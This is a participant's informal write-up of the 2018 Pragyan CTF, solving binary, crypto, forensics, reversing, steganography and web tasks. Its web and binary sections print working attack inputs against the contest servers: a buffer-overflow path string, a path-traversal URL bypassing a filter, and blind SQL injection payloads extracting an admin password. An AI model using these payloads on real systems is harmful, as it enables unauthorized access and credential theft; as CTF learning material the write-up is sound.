[2018] Pragyan CTF

[2018] Pragyan CTF

Rustam @SecondFry Gubaydullin

[UPD#1] Added links for Unbreakable encryption, Improper encryption, Quite an EC task and Rivest, Shamir and Aldeman’s quest.

CTF was quite fun. Required to think out of the box – sometimes maybe too much. Overall extremely satisfactory experience.

Sadly I didn't get all the flags – all in all, this was my first real CTF.

This write-up only covers tasks I know something about.
I will add links for other tasks as some good write-ups on them will emerge.

Contents

Binary

Old school hack (200pts)

Chris is trying out to be a police officer and the applications have just been sent into the police academy. He is really eager to find out about his competition. Help it him back the system and view the other applicant’s applications.
The service is running at 128.199.224.175:13000
Hint! Path Traversals are always a classic.

https://www.dropbox.com/s/7p5ucnscynq37k0/police_academy?dl=0

So after reading a huge chunk of radare2 documentation, I've thrown the binary inside and started to read disassembly.

write about visual mode and attach screenshots from ubuntu VM

Upon running the binary you are prompted to enter password. You may find it laying down in disassembly. iirc it's kaiokenx20.

attach screenshot related to password discovery, VM is dead btw

Attack vector is buffer overflow of password as memory for filename is right next to it.

One small thing is strlen check for length of filename so you can't just throw flag.txt inside. Required length is 36 symbols, so you may pad your filename with ./.

Final overflow would be kaiokenx20AAAAAA././././././././././././././././flag.txt

Unbreakable encryption (350pts)

[UPD#1] Write-up by Batman's Kitchen (CTFtime)

[UPD#1] Short write-up by AnyoDDungiRaniKayo (CTFtime)

Cryptography

Xmen OR the avengers (100pts)

the legion of doom is expecting an impending attack from a group of superheroes. they are not sure if it is the Xmen OR the avengers. they have received some information from a spy, a zip file containing the following files:
info_crypt.txt
info_clear.txt
superheroes_group_info_crypt.txt
help the legion of doom in decrypting the last file so they can prepare themselves and prevent their impending doom.
Hint! Note: The key for the second decryption is the MD5 hash of the first resulting file.

https://www.dropbox.com/sh/ihtfdqrxerhm83m/AABjICwMhmc_rUdwOdf4_lWOa?dl=0

Well, this one was quite simple and yet quite disappointing for some.

You XOR info_crypt.txt with info_clear.txt to get XOR key.

with open('info_clear.txt', 'rb') as f:
  data_clear = f.read()
with open('info_crypt.txt', 'rb') as f:
  data_crypt = f.read()
wrong_key = ''.join([chr(ord(a) ^ ord(b)) for (a, b) in zip(data_clear, data_crypt)]) # Terrible Python oneliner to XOR stuff

As a result you would get such text:

i am a hydra agenT, coverly spying on the superHeroes. I am aware of the group that iS going to aTtack you...but Hydra has had its diffErences with you in the past, so i'm not going to maKe it vEry simple for You ....ecb...aes(I Vouch for this: 12345)...md5(this)...base64...

So couple of things going here – THISTHEKEYIV put there to kinda mislead you as cipher used is AES in ECB mode. Key is not I Vouch for this: 12345 but md5(this) as hint suggested earlier.

It's b3aab305ba957fdffa0b62ae727492a9.

So you then just base64 decrypt the superheroes_group_info_crypt.txt, use that MD5 as key and... Nothing happens!

This part which made some people mad. In their point of view the solution required too much guessing. You are misleaded, but still "guess" the key, use hint, etc.
So the problem was in line break. If you remove last byte from XOR key and MD5 it, you, obviously, will get another hash – 285906a3d894059c42e1e9f640725f9b.

Flag – pctf{it's_the_justice_league_DC_for_life_hellya}.

Improper encryption (100pts)

Two brothers, Shivam and Mit were fighting for the only computer they had in their house. Watching this their father got angry and locked the computer with a strong password of length 28 which consists of alphabets. To unite them he gave them a puzzle to solve.
He used two random strings and added the half-half of password in each string at some random position. He wanted to apply one-time-pad on both strings . So he used a smaller key 'k' of length 14(contains only english alphabets), and used some pseudo random generator, to get a longer key(K) of suitable size. Then he XOR each string with the generated key(K),and get encrypted message M1, and M2. He gave Shivam M1 and Mit M2 and asked them to find the password.
Also, to help them he also generated a string of suitable size by repeating k several times and then applied one time pad on it by larger key(K) to get M3.
Shivam and Mit come to you with M1, M2, and M3. Help them find the password.
M1=2d142303073d05392c3d3e273c2a1a211f082b280d2d0e332025380301352a122a151c3a342e362d2723171904011c0c0c292b3d0122063e2e1e2a08102a2d3d0b2e102123141c280f0c373d2b380d3d0301301f2d281935233239330f3a102b123b0d2a
M2=29190f1b18390707093a290b2d0b113f37332533333a0c3d1a29160a2f100a1d0034323b1b2e1225252500182531391d13260c21211019242d0a0a123b362d232d3a3a0a083c0e363c183a032b332d252c5637252d047b522a1e462a2a2909081705033d
M3=15350a23053f04272a2f12113a2137202a3022081616090c32162b0b32333413161725072508391f3c36192e1e1e37030b361a2a26163337130628020b34352d1a2e143d3f0a1b1d13012a19223c2b1f0c172b3406033808061d1a2306133011080e1839
First 14 letter of password is: sAldnJfpUGlciN

[UPD#1] Write-up by SST CTF (CTFtime)

So apparently this was about OTP key reuse attack. I didn't get it in time.

Quite an EC task (200pts)

M = 93556643250795678718734474880013829509320385402690660619699653921022012489089
A = 66001598144012865876674115570268990806314506711104521036747533612798434904785
B = ?

P = (56027910981442853390816693056740903416379421186644480759538594137486160388926, 65533262933617146434438829354623658858649726233622196512439589744498050226926)

Q = (61124499720410964164289905006830679547191538609778446060514645905829507254103, 2595146854028317060979753545310334521407008629091560515441729386088057610440)

n = ?
n < 400000000000000000000000000000
Find n. n is the flag.
Note: The flag is not in the usual format.

[UPD#1] Proper and complete explanation by pwang00 (Sanguinius)

Elliptic curves... I just wish we would never meet. Let's learn a bit (I don't know what I'm talking about, consult specialist).

Most commonly you will ECs in following notation (short Weierstass model):

Y ** 2 = X ** 3 + A * X + B

But if try to go throw special math hell of reading Wikipedia, you may stumble upon page regarding counting points on ECs (https://en.wikipedia.org/wiki/Counting_points_on_elliptic_curves).

So it real world applications one would EC over some field (?), so equation changes:

(Y ** 2) mod M = (X ** 3 + A * X + B) mod M

This makes it trivial to find B – I personally used z3 but you don't need it here really.

Here goes really bad python code – https://pastebin.com/LbxN1v1j.

After that I though I should get order (?) of the EC which basically equals (?) to the amount of points of that curve (and it's finite over the field because you only use natural X for points or something like that, don't ask me).

I thrown this EC into sage (1GB math app, geez), asked it for order ans got...

93556643250795678718734474880013829509196181230338248789325711173791286325820

Well, it's definitely larger than 400000000000000000000000000000.

So I lurked in IRC a little to find a guy who claimed to solve all the crypto challenges and he honestly said that he just googled the solution.

Apparently this task was present in some past CTF and this weird magic is the solution – https://pastebin.com/gpDNYzpb.

Rivest, Shamir and Aldeman’s quest (200pts)

[UPD#1] Write-up by bi0s (CTFtime)

Forensics

Quick Response (100pts)

Tony had created a QR code for a specific purpose, and sent to his friend Rhody for deployment but when deployed, the QR code wasn’t working as it was supposed to. Figure out what’s wrong and help fix the problem.

Probably was about recovering QR code – you need to know quite a lot to perform it. Sadly basically first QR code reading app from Play Store was able to get the flag out of image.

Broken, but not enough :(

Ears to the rescue (150pts)

Jack is trapped inside a room. All he can see and hear is a sound, his ears hear only the specific sound. He needs to escape, help him figure out what the sound means.
Hint! The number of distinct amplitudes will give you a clue.

https://www.dropbox.com/s/0wh3b1agrp9rsfn/audible.wav?dl=0

Right tool for this

This task ate my soul. You can immediately see there are some octal data there.

I've never knew how to decode octal into ASCII so I've tried inventing the wheel.
I've failed T_T.

[10:33] <Second_Fry> Escape, yeah, it's clearly octal in ears one, but how you decode it?
[10:34] <Escape> http://www.unit-conversion.info/texttools/octal/
[??:??] <Escape> https://gist.github.com/anonymous/ed4500ede4ef1f59d3bea15587d42c8e

Reverse

Assemble your way to the flag (50pts)

My friend was trying out assembly for the first time, he has no clue what he's doing, help him out and procure your reward in the form of a flag :)

https://www.dropbox.com/s/vzonqj6vrdarh12/question?dl=0

write about radare2

attach screenshot of main function (so VM is still dead)

So as you may see that's quite a lot of XOR and PUSH operations. Some characters get XORed and PUSHed into the stack, okay.

attach screenshot of main function end (IDK should have used VirtualBox)

But that stack is never accessed or cleaned! So we just look into it...

attach screenshot of stack with flag laying right there (this VMWare stuff is worthless)

Stenography

Scientist’s research (150pts)

Mary, a data scientist, specializing in CNN, has been working on a problem, she has recorded her observations in a table. Have a look at the data and deduce the flag.

https://www.dropbox.com/s/suze4342ltniz96/observations.xlsx?dl=0

First I thought this data needs normalization, then I would be able to do something with it and such, but then I just zoomed out it far enough to uncover the flag.

It's colored as I was trying to work with data, you know :D

Pictorial mess (300pts)

Johnny had an image that he was going to use for a very important purpose. Someone had hacked into his system and tampered with the image. Help him recover it.
Hint! The characters in the images read "Make me tall", but that's not the flag.

https://www.dropbox.com/s/enhw0c1pt2td8r1/files.zip?dl=0

Hint wasn't there right from the start – you could play with color data of the image to uncover this message.

You can barely see it

So you then made them tall-er by editing metadata of images (using hexeditor or any other tool like tweakpng). Apparently all of those are perfect squares (but I made them rectangles anyway :D).

Huh, look some binary!

Then you extract binary data out of there:

11111101111110101111
11111011111111111111
....................
01001011100001111001

And read it as columns (roleplaying Chinese is required) to get the flag.

Web

Unfinished business (100pts)

There was a miscellaneous platform being built for various purposes, but it had to be shelved halfway through.
Wanna check it out? Here is the link: http://128.199.224.175:25000/
Note: Use your Pragyan CTF credentials to log in.

IDK how long these hosts will stay alive, maybe a week?

index.php

If you log-in with 'I'm Admin' checked you fall into chain of redirects.

Networking with Preserve log quite helpful in such situations

So you just need to get admin.php contents. I've used curl as you can quite easily copy command right from Networking tab.

;)

Authenticate your way to admin (150pts)

Owen had created an authentication system which lets users login with their email-id or their team name. But that’s not fun is it? Logging in as the admin beats it all, so there’s your challenge.
The portal is running at 128.199.224.175:23000
Note: Use your Pragyan CTF credentials to login to the web portal.

https://www.dropbox.com/sh/1ubs6gfb8l8dxba/AAACmMOwvJaipEZc8_IUUs53a?dl=0

Relevant code from login.php:

$_SESSION['id'] = $identifier;
if($type === 'team_name') {
 if(verify_teamname_password($team_name, $password) === true) {
  $_SESSION['logged_in'] = true;
  redirect('/homepage.php');

As you may notice $_SESSION['id'] being set before password check.
So you just auth with legit credentials and then "fail" next auth attempt as admin.

Yes, it was that easy

El33t Articles Hub (200pts)

Are you a person interested in reading articles on hacking? You’ve come to the right place, check out our brand new website for article-reading enthusiasts.
The portal is running on 128.199.224.175:22000

Upon getting to host you are greeted with article selection. It's pretty clear that articles are just include into the page.

Different favicons?

Instead of attacking file parameter here, I've attacked favicon.php.

If you pass non legitimate parameter to it, you get full usage information :D

This made easy to read favicon.php itself, then index.php of root directory and get to the flag address – /secret/flag_7258689d608c0e2e6a90c33c44409f9d.txt.

I've just requested the file and got it, but apparently this was unintended and later was patched to return 403. Intended way was to work around sanitize and finally get proper url – http://128.199.224.175:22000/?file=.....///secret/./flag_7258689d608c0e2e6a90c33c44409f9d (credit to Escape from #pragyanctf channel on freenode IRC).

Intended way

Animal attack (200pts)

Animals have taken over our world and a specific team of animal spies have taken the role of leading the entire army of animals. We humans have formed a group of rebels who have taken it up as a mission to find the main users of the animal spies and find the admin of that group. The admin, with his username and password can launch a powerful attack on the humans. Help the human rebels group get the world back from the animals.
The portal is available at :- http://128.199.224.175:24000/
Search field huh?

SQL injection time! You quickly find the general idea how query constructed:

SELECT (?) FROM (?) WHERE name LIKE '$search'

You may find that how many columns are there by using ORDER BY as it doesn't require column name, it works with column index too!

%' ORDER BY 1# // ok
%' ORDER BY 2# // ok
...
%' ORDER BY 5# // ok
%' ORDER BY 6# // fails

And now time for UNION SELECT masterpiece!

Union keyword is blacklisted T_T

And then blind SQL injection fiesta begins... I've used substring approach like this:

%' and ascii(
  substring(
    (SELECT password FROM users WHERE username = 'admin'),
    1 /* this is index of character */
    1 /* this is amount to substring */
  )
) > 68 /* ASCII decimal value of letter */
LIMIT 1 #

I could just for-loop all possible variables but decided to be gentle on the server.
You should too ;)

That's all

Looking forward for write-ups on tasks which I didn't complete (and EC task, please explain that magic).

<3, till next time!

@Second_Fry (Twitter, Twitch).

P.S. My other writeups – https://telegra.ph/WriteUps-11-21.

Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org